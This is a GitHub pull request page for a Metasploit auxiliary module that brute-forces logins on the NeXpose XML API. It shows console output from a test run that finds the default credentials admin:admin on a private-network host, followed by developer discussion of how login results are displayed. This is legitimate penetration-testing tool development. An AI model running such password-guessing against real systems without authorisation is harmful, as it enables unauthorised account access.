NeXpose Aux script to guess password against XML API interface #1073

Merged
merged 3 commits into from Nov 27, 2012

3 participants

@kost

NeXpose Aux script to guess password against XML API interface

@brandonprry

Cool, looks good here. I prefer this modules printout over the openvas ones fwiw.

msf auxiliary(nexpose_api_login) > set USER_AS_PASS false
USER_AS_PASS => false
msf auxiliary(nexpose_api_login) > run

[] 192.168.1.3:3780 NEXPOSE_API - [1/1] - NeXpose API - - Trying username:'admin' with password:'adm'
[-] 192.168.1.3:3780 NEXPOSE_API - [1/1] - NeXpose API - FAILED LOGIN. 'admin' : 'adm'
[
] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(nexpose_api_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf auxiliary(nexpose_api_login) > run

[] 192.168.1.3:3780 NEXPOSE_API - [1/2] - NeXpose API - - Trying username:'admin' with password:'admin'
[+] 192.168.1.3:3780 NeXpose API - SUCCESSFUL LOGIN. 'admin' : 'admin'
[
] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(nexpose_api_login) >

@kost

Output should be same on all modules. Try turning off verbose. Then you will get only success ones.

Anyway, would be good to come up with solution with all login modules in msf to display success logins on the end (or when I exit with CTRL+C). So, we can reuse and unify in all modules.

@wchen-r7 wchen-r7 merged commit c0df3a0 into rapid7:master Nov 27, 2012

1 check passed

Details default The Travis build passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment